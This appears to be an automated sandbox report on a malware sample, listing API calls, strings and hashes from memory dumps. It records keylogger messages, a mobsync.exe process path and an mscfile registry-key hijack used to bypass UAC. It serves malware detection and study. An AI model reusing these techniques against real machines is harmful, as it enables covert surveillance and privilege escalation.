                                    • Opcode ID: d171684603520d51c997ec8c3ba09f317d342c496b8654638660ca239062314b
                                    • Instruction ID: 46a3231d1dc89d19a33c39bde425d831187aaa3ea2918368e4f67e373df8e39a
                                    • Opcode Fuzzy Hash: d171684603520d51c997ec8c3ba09f317d342c496b8654638660ca239062314b
                                    • Instruction Fuzzy Hash: 8F514F71D00219AADB51EB95DC92EEFB7BEEF14300F10016AF505E6241EF746B49CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _strpbrk.LIBCMT ref: 007169B8
                                    • _free.LIBCMT ref: 00716AD5
                                      • Part of subcall function 0070698A: IsProcessorFeaturePresent.KERNEL32(00000017,0070695C,?,?,?,?,?,00000000,?,?,0070697C,00000000,00000000,00000000,00000000,00000000), ref: 0070698C
                                      • Part of subcall function 0070698A: GetCurrentProcess.KERNEL32(C0000417), ref: 007069AE
                                      • Part of subcall function 0070698A: TerminateProcess.KERNEL32(00000000), ref: 007069B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                    • String ID: *?$.
                                    • API String ID: 2812119850-3972193922
                                    • Opcode ID: 6b240cb6298be9445e1c69f89697b1b7d8a15ebc161a029acef64c7191a131ac
                                    • Instruction ID: 0a6e8fcf006cbc6e9a8b119a95e980b60732f8def8ac84022477e2fc3e7c1e14
                                    • Opcode Fuzzy Hash: 6b240cb6298be9445e1c69f89697b1b7d8a15ebc161a029acef64c7191a131ac
                                    • Instruction Fuzzy Hash: 44517075E00219EFDF14DFACC841AEDBBB5EF48314F24816DE554E7380E679AA418B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006E4906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006E4921
                                      • Part of subcall function 006E4906: CreateCompatibleDC.GDI32(00000000), ref: 006E492D
                                      • Part of subcall function 006E441B: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 006E4431
                                      • Part of subcall function 006E4493: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 006E44A4
                                      • Part of subcall function 006E79DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E79F9
                                    • DeleteFileW.KERNEL32(00000000,0000001B), ref: 006E5858
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile$GdipImage$CompatibleDeleteFromLoadSaveStream
                                    • String ID: dat$image/png$png
                                    • API String ID: 4253173196-186023265
                                    • Opcode ID: a8064c883a2379819aebefac420c72111a46882554b7f4d08b8eff04b4617dde
                                    • Instruction ID: d2683ef7b19e6218513a5c9a23ce7528b8c5aa2b7ce9d07e82684afd7f853aab
                                    • Opcode Fuzzy Hash: a8064c883a2379819aebefac420c72111a46882554b7f4d08b8eff04b4617dde
                                    • Instruction Fuzzy Hash: A94145719083409BC354FB60D862DEFB7E7AF95350F00092EF446572A2EF705A09C79A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\mobsync.exe,00000104), ref: 0070CCCA
                                    • _free.LIBCMT ref: 0070CD95
                                    • _free.LIBCMT ref: 0070CD9F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Windows\SysWOW64\mobsync.exe
                                    • API String ID: 2506810119-2325505231
                                    • Opcode ID: 2aad9025726c782324640224da04362af7b846a398f6a1ea7a6e7b11a08014a3
                                    • Instruction ID: a5efcefbaaef0a1801d28f174d704be1e03429c92362fe728cb13e898dab1dc6
                                    • Opcode Fuzzy Hash: 2aad9025726c782324640224da04362af7b846a398f6a1ea7a6e7b11a08014a3
                                    • Instruction Fuzzy Hash: C3318071A00218EFDB22DF99DC8599EBBFCEB85310F104266F90997291DB788A45DB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006D9634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0073C350), ref: 006D9642
                                      • Part of subcall function 006D9634: wsprintfW.USER32 ref: 006D96C3
                                      • Part of subcall function 006D9634: SetEvent.KERNEL32(00000000,00000000), ref: 006D96ED
                                      • Part of subcall function 006E6C80: GetLocalTime.KERNEL32(00000000), ref: 006E6C9A
                                    • CloseHandle.KERNEL32(?), ref: 006D9581
                                    • UnhookWindowsHookEx.USER32 ref: 006D9594
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
                                    • String ID: Online Keylogger Stopped$[Info]
                                    • API String ID: 3650414481-1913360614
                                    • Opcode ID: 03029e14d69532070f9a8d6410c5f89bc0688341c9a7ac9ded124fee2c49cd7c
                                    • Instruction ID: 8747588dc2c104d0b98ed0893ac463bf3d74c7218dc04eb56c4babdf55df5c75
                                    • Opcode Fuzzy Hash: 03029e14d69532070f9a8d6410c5f89bc0688341c9a7ac9ded124fee2c49cd7c
                                    • Instruction Fuzzy Hash: C5014C31E002016BD7267738D8077BEBBB39F56310F80016EE58112352DB756946C7EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006DC119
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2005118841-1866435925
                                    • Opcode ID: e8bf0524068c5f44cd78a1573d03567225aa043d1ead265c234b698673b6d16f
                                    • Instruction ID: 09b9b05d5d9b6c1d5d8d26a6ff9741fa3e9d72054c774ba601bd644bc5aa0f4a
                                    • Opcode Fuzzy Hash: e8bf0524068c5f44cd78a1573d03567225aa043d1ead265c234b698673b6d16f
                                    • Instruction Fuzzy Hash: E001D6B1D8030DFAEB50EA54CC13FFA735A9B10750F50840FFA01963C3DA696502C6A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 006E0A4C
                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 006E0A65
                                    • RegCloseKey.ADVAPI32(00000000), ref: 006E0A70
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: origmsc
                                    • API String ID: 3677997916-68016026
                                    • Opcode ID: cfc9e239d5765fc97b657833fc907557c6eb208036a123ead5d2ac462e850868
                                    • Instruction ID: 970088e25d63e47768a9b1e61397e165024d3242ba2072eb11aef2edde3843c1
                                    • Opcode Fuzzy Hash: cfc9e239d5765fc97b657833fc907557c6eb208036a123ead5d2ac462e850868
                                    • Instruction Fuzzy Hash: 28018B3180022CBBDF219FA5DC08DEB7F3AEF05350F004155BA0962121D6358AA6DBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0073C578,?), ref: 006E0978
                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 006E0993
                                    • RegCloseKey.ADVAPI32(00000000), ref: 006E099C
                                    Strings
                                    • http\shell\open\command, xrefs: 006E096E
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: http\shell\open\command
                                    • API String ID: 3677997916-1487954565
                                    • Opcode ID: 5163826a2ad21f00bea19926de05179a24fb8122013d1573f6ad67459068d453
                                    • Instruction ID: ddf95d2cf6080b9f6a8555c0e6221b534c9e6a839687ee2253a2ce716fe96c17
                                    • Opcode Fuzzy Hash: 5163826a2ad21f00bea19926de05179a24fb8122013d1573f6ad67459068d453
                                    • Instruction Fuzzy Hash: C4F0C871900118FBEB70DA96EC09EDFBBBDEB84B01F104065B944E1111DA745F458BB4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0073BB08), ref: 006E0B57
                                    • RegSetValueExW.ADVAPI32(0073BB08,0072F724,00000000,00000000,00000000,00000000,0072F724,?,80000001,?,006D6020,0072F724,0073BB08), ref: 006E0B86
                                    • RegCloseKey.ADVAPI32(0073BB08,?,80000001,?,006D6020,0072F724,0073BB08), ref: 006E0B91
                                    Strings
                                    • Software\Classes\mscfile\shell\open\command, xrefs: 006E0B55
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Classes\mscfile\shell\open\command
                                    • API String ID: 1818849710-505396733
                                    • Opcode ID: 46e5dd8180566aa7c1c680ab9f7103b7fccd9a2416d30043fa7bc9f21827d5cf
                                    • Instruction ID: 302d74ec9279b211bc115442fc1e81b18efe24ae4c4c96268c21c31ed711e190
                                    • Opcode Fuzzy Hash: 46e5dd8180566aa7c1c680ab9f7103b7fccd9a2416d30043fa7bc9f21827d5cf
                                    • Instruction Fuzzy Hash: 1FF0AF31400108BBDF209FA0EC05EEA776EEB04750F108519BC0596210E67A9F04DBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 006D13B7
                                    • GetProcAddress.KERNEL32(00000000), ref: 006D13BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: GetCursorInfo$User32.dll
                                    • API String ID: 1646373207-2714051624
                                    • Opcode ID: 409e458e0f8c7ea3751c6682eaba15602038bf0f0dd80945bf980795830c18f4
                                    • Instruction ID: 07a902c3e07e404acd281fede7a68920718c0324d86dc14a6c4521126128996d
                                    • Opcode Fuzzy Hash: 409e458e0f8c7ea3751c6682eaba15602038bf0f0dd80945bf980795830c18f4
                                    • Instruction Fuzzy Hash: 88B092F16826009BA6216BB0AD0D8883AF4F654703B108851B101D21A1CB7C41019F28
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 006D1472
                                    • GetProcAddress.KERNEL32(00000000), ref: 006D1479
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetLastInputInfo$User32.dll
                                    • API String ID: 2574300362-1519888992
                                    • Opcode ID: 25a0f26f60bc88d79eb5edf28c99c037a17e8364e51b8a6e8541b946f22f7794
                                    • Instruction ID: c3b2e2081cc47320cf9086a6096ed3944a89fd2f3a8dc30e3f88e153e097295d
                                    • Opcode Fuzzy Hash: 25a0f26f60bc88d79eb5edf28c99c037a17e8364e51b8a6e8541b946f22f7794
                                    • Instruction Fuzzy Hash: CBB092F06407049BA6219BB0AD0D8083E7AB644702B00C944F106921A1CB7C4102BB39
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 006D148F
                                    • GetProcAddress.KERNEL32(00000000), ref: 006D1496
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetConsoleWindow$kernel32.dll
                                    • API String ID: 2574300362-100875112
                                    • Opcode ID: 66e3665307eadc3c418546b12310b5e43de58e48a96da76151ccdaefadb2dbd0
                                    • Instruction ID: 73ddfd06917525543fc58baafb5d2126e346349dc778046b6920e0b9038f3bd8
                                    • Opcode Fuzzy Hash: 66e3665307eadc3c418546b12310b5e43de58e48a96da76151ccdaefadb2dbd0
                                    • Instruction Fuzzy Hash: 6EB092F06423009BA6319BB0AE1D8083B7BA70470AB00C444B601921A1CA7C42029B39
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: __alldvrm$_strrchr
                                    • String ID:
                                    • API String ID: 1036877536-0
                                    • Opcode ID: c6ef87be5afec7be64c81fb389682078d407a9cdd0e7a8f7fa33338ae39b2213
                                    • Instruction ID: c898342938cfa311a070de927f71d209b5cfae7e6b4625082f980c30ed50f3cf
                                    • Opcode Fuzzy Hash: c6ef87be5afec7be64c81fb389682078d407a9cdd0e7a8f7fa33338ae39b2213
                                    • Instruction Fuzzy Hash: 0EA13771A003869FDB11CF5CC891BEEBBE5EF15354F14816DE4859B2C2D67C9A81C790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 0af3302f0e4d7c4d98f7a0f08b7416f480f0c787c05e6f21e0a6c6580a98ca1e
                                    • Instruction ID: 66fa3ba28a656ae191c94419d183abe8d5f740ec3ef4dcd243a42bb4f4a4a799
                                    • Opcode Fuzzy Hash: 0af3302f0e4d7c4d98f7a0f08b7416f480f0c787c05e6f21e0a6c6580a98ca1e
                                    • Instruction Fuzzy Hash: A8411B31A00620EBDB25ABBCAC89AAE3AE4EF45330F144659F518D61D3E67C8D4056F2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 486f9d734d77c729dab6cdc60f8cf8aa2cf78c22256966be7fc9976514f50a39
                                    • Instruction ID: 52f70d158d2b6d30792352bc3542c2e2a15396777068d3e54d099ef3a5691112
                                    • Opcode Fuzzy Hash: 486f9d734d77c729dab6cdc60f8cf8aa2cf78c22256966be7fc9976514f50a39
                                    • Instruction Fuzzy Hash: 7D410672A00344EFD7259F38CC55B6ABBE8FB88710F20472AF115DB2D1D679A9118790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 95%
                                    			E105CD2F4(void* _a4, intOrPtr* _a8) {
                                    				char _v5;
                                    				intOrPtr _v12;
                                    				char _v16;
                                    				signed int _t44;
                                    				char _t47;
                                    				intOrPtr _t50;
                                    				signed int _t52;
                                    				signed int _t56;
                                    				signed int _t57;
                                    				void* _t59;
                                    				signed int _t63;
                                    				signed int _t65;
                                    				char _t67;
                                    				intOrPtr* _t68;
                                    				intOrPtr* _t69;
                                    				intOrPtr* _t71;
                                    				intOrPtr _t75;
                                    				void* _t76;
                                    				void* _t77;
                                    				signed int _t80;
                                    				intOrPtr _t82;
                                    				void* _t86;
                                    				signed int _t87;
                                    				void* _t89;
                                    				signed int _t91;
                                    				intOrPtr* _t98;
                                    				void* _t101;
                                    				intOrPtr _t102;
                                    				intOrPtr _t103;
                                    
                                    				_t101 = _a4;
                                    				if(_t101 != 0) {
                                    					_t80 = 9;
                                    					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
                                    					_t98 = _a8;
                                    					__eflags = _t98;
                                    					if(_t98 != 0) {
                                    						_t82 =  *((intOrPtr*)(_t98 + 4));
                                    						_t47 =  *_t98;
                                    						_v16 = _t47;
                                    						_v12 = _t82;
                                    						__eflags = _t82 - 0xffffffff;
                                    						if(__eflags > 0) {
                                    							L7:
                                    							_t89 = 7;
                                    							__eflags = _t82 - _t89;
                                    							if(__eflags < 0) {
                                    								L12:
                                    								_v5 = 0;
                                    								_t50 = E105CD441(_t82, __eflags,  &_v16,  &_v5);
                                    								_t75 = _v16;
                                    								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
                                    								_t52 = L105E1A33(_t75, _v12, 0x15180, 0);
                                    								 *(_t101 + 0x1c) = _t52;
                                    								_t86 = 0x4591d8;
                                    								_t76 = _t75 - _t52 * 0x15180;
                                    								asm("sbb eax, edx");
                                    								__eflags = _v5;
                                    								if(_v5 == 0) {
                                    									_t86 = 0x4591a4;
                                    								}
                                    								_t91 =  *(_t101 + 0x1c);
                                    								_t56 = 1;
                                    								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
                                    								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
                                    									L16:
                                    									_t57 = _t56 - 1;
                                    									 *(_t101 + 0x10) = _t57;
                                    									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
                                    									_t59 = L105E1A33( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
                                    									_t87 = 7;
                                    									asm("cdq");
                                    									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
                                    									_t63 = L105E1A33(_t76, _v12, 0xe10, 0);
                                    									 *(_t101 + 8) = _t63;
                                    									_t77 = _t76 - _t63 * 0xe10;
                                    									asm("sbb edi, edx");
                                    									_t65 = L105E1A33(_t77, _v12, 0x3c, 0);
                                    									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
                                    									 *(_t101 + 4) = _t65;
                                    									_t67 = 0;
                                    									__eflags = 0;
                                    									 *_t101 = _t77 - _t65 * 0x3c;
                                    									L17:
                                    									return _t67;
                                    								} else {
                                    									do {
                                    										_t56 = _t56 + 1;
                                    										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
                                    									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
                                    									goto L16;
                                    								}
                                    							}
                                    							if(__eflags > 0) {
                                    								L10:
                                    								_t68 = E105CB377();
                                    								_t102 = 0x16;
                                    								 *_t68 = _t102;
                                    								L11:
                                    								_t67 = _t102;
                                    								goto L17;
                                    							}
                                    							__eflags = _t47 - 0x934126cf;
                                    							if(__eflags <= 0) {
                                    								goto L12;
                                    							}
                                    							goto L10;
                                    						}
                                    						if(__eflags < 0) {
                                    							goto L10;
                                    						}
                                    						__eflags = _t47 - 0xffff5740;
                                    						if(_t47 < 0xffff5740) {
                                    							goto L10;
                                    						}
                                    						goto L7;
                                    					}
                                    					_t69 = E105CB377();
                                    					_t102 = 0x16;
                                    					 *_t69 = _t102;
                                    					E105C77D0();
                                    					goto L11;
                                    				}
                                    				_t71 = E105CB377();
                                    				_t103 = 0x16;
                                    				 *_t71 = _t103;
                                    				E105C77D0();
                                    				return _t103;
                                    			}
                                    0x105cd2fd
                                    0x105cd302
                                    0x105cd322
                                    0x105cd323
                                    0x105cd325
                                    0x105cd328
                                    0x105cd32a
                                    0x105cd33d
                                    0x105cd340
                                    0x105cd342
                                    0x105cd345
                                    0x105cd348
                                    0x105cd34b
                                    0x105cd356
                                    0x105cd358
                                    0x105cd359
                                    0x105cd35b
                                    0x105cd377
                                    0x105cd37b
                                    0x105cd384
                                    0x105cd389
                                    0x105cd390
                                    0x105cd39d
                                    0x105cd3a2
                                    0x105cd3ac
                                    0x105cd3b1
                                    0x105cd3b6
                                    0x105cd3b8
                                    0x105cd3bf
                                    0x105cd3c1
                                    0x105cd3c1
                                    0x105cd3c6
                                    0x105cd3cb
                                    0x105cd3cc
                                    0x105cd3cf
                                    0x105cd3d7
                                    0x105cd3d7
                                    0x105cd3d8
                                    0x105cd3e6
                                    0x105cd3ee
                                    0x105cd3fb
                                    0x105cd3fc
                                    0x105cd406
                                    0x105cd40c
                                    0x105cd416
                                    0x105cd41d
                                    0x105cd421
                                    0x105cd425
                                    0x105cd42a
                                    0x105cd42e
                                    0x105cd436
                                    0x105cd436
                                    0x105cd438
                                    0x105cd43b
                                    0x00000000
                                    0x105cd3d1
                                    0x105cd3d1
                                    0x105cd3d1
                                    0x105cd3d2
                                    0x105cd3d2
                                    0x00000000
                                    0x105cd3d1
                                    0x105cd3cf
                                    0x105cd35d
                                    0x105cd366
                                    0x105cd366
                                    0x105cd36d
                                    0x105cd36e
                                    0x105cd370
                                    0x105cd370
                                    0x00000000
                                    0x105cd370
                                    0x105cd35f
                                    0x105cd364
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x105cd364
                                    0x105cd34d
                                    0x00000000
                                    0x00000000
                                    0x105cd34f
                                    0x105cd354
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x105cd354
                                    0x105cd32c
                                    0x105cd333
                                    0x105cd334
                                    0x105cd336
                                    0x00000000
                                    0x105cd336
                                    0x105cd304
                                    0x105cd30b
                                    0x105cd30c
                                    0x105cd30e
                                    0x00000000

                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 052967b5b448af53dc2c5bd8eef6940f52376eadd66e8ec4276b382b03b06a8d
                                    • Instruction ID: ba2521565587a9a7a1b7dddff424019dca9819baa4af973c09bfafb9b32bdc1a
                                    • Opcode Fuzzy Hash: 052967b5b448af53dc2c5bd8eef6940f52376eadd66e8ec4276b382b03b06a8d
                                    • Instruction Fuzzy Hash: 2C410771A00748EFD714AFB8CE49B9ABFBCEF84B10F10492AF141DB680D775A9018790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,0073C184), ref: 006D4D98
                                    • CreateThread.KERNEL32 ref: 006D4DAB
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,006D4C44,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 006D4DB6
                                    • CloseHandle.KERNEL32(00000000,?,?,006D4C44,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 006D4DBF
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                    • String ID:
                                    • API String ID: 3360349984-0
                                    • Opcode ID: 8dac3ee3e0dd7a77853e91dc2a219457c5f340bc4e5ae6c9a51dec3431082ac0
                                    • Instruction ID: d8b0d6b30c4c7dc99c9e34874ee0da58b729f40a5d95547bf14d09a29207ec90
                                    • Opcode Fuzzy Hash: 8dac3ee3e0dd7a77853e91dc2a219457c5f340bc4e5ae6c9a51dec3431082ac0
                                    • Instruction Fuzzy Hash: A7414A71D00218AFCB50EBA4CC95DFEBBBEAF55320F04451AF852A7391DF34AA458B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006E7614: GetCurrentProcess.KERNEL32(?,?,?,006E80D1,WinDir,00000000,00000000), ref: 006E7625
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006DD231
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 006DD253
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 006DD3DA
                                    • CloseHandle.KERNEL32(00000000), ref: 006DD3E9
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 592884611-0
                                    • Opcode ID: 150fe2bbfd539675aab02460adbd6ea283668a270ef6a9a92cbef9a43cfe7d7d
                                    • Instruction ID: e410c89d69093fdf8f8e6e73bbfabef12ae3521cdba785a49a7d72907daa9947
                                    • Opcode Fuzzy Hash: 150fe2bbfd539675aab02460adbd6ea283668a270ef6a9a92cbef9a43cfe7d7d
                                    • Instruction Fuzzy Hash: 93414331D042189BC799F760DC92AEDB3B7AF55300F00419EB44997292EF705F89CE58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006E7ABF: GetForegroundWindow.USER32(76D26490,?), ref: 006E7ACF
                                      • Part of subcall function 006E7ABF: GetWindowTextLengthW.USER32(00000000), ref: 006E7AD8
                                      • Part of subcall function 006E7ABF: GetWindowTextW.USER32 ref: 006E7B02
                                    • Sleep.KERNEL32(000001F4), ref: 006D8AAF
                                    • Sleep.KERNEL32(00000064), ref: 006D8B49
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$ForegroundLength
                                    • String ID: [ $ ]
                                    • API String ID: 3309952895-93608704
                                    • Opcode ID: 47e20f47b91cb282ab6d32051159b5cadbaec335f82d88b1cc63c71806992c3b
                                    • Instruction ID: 7e665863cd2931eb0f094bded1c9a2bc743c6aaf18dc5ed3f0bc8d2b66cc4260
                                    • Opcode Fuzzy Hash: 47e20f47b91cb282ab6d32051159b5cadbaec335f82d88b1cc63c71806992c3b
                                    • Instruction Fuzzy Hash: F0210371E082006BC644F779EC2796E73AB9F92340F40043FF8425B3C2EE64AE05829A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ab2e7a222e93e98a421bf96e326815fa20e77d342c42a94e037700a28a22ee0d
                                    • Instruction ID: 27d0bb82b878722355dcbc892ce60cfd6200ab69811d0b3f616bac8e4485d529
                                    • Opcode Fuzzy Hash: ab2e7a222e93e98a421bf96e326815fa20e77d342c42a94e037700a28a22ee0d
                                    • Instruction Fuzzy Hash: B401A2B220931AFEE73126B86CC5FAB629DEF817B4B340735F221611D5DE6CCC404164
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0aa46de5117be43cad65517e50d9dbf1a9dddae466c1b41a99d4df3d98de90fc
                                    • Instruction ID: f7a4b14437d06d181f4bcaedee01e8e6339fc5b57d840217072652e2ac2cdd4d
                                    • Opcode Fuzzy Hash: 0aa46de5117be43cad65517e50d9dbf1a9dddae466c1b41a99d4df3d98de90fc
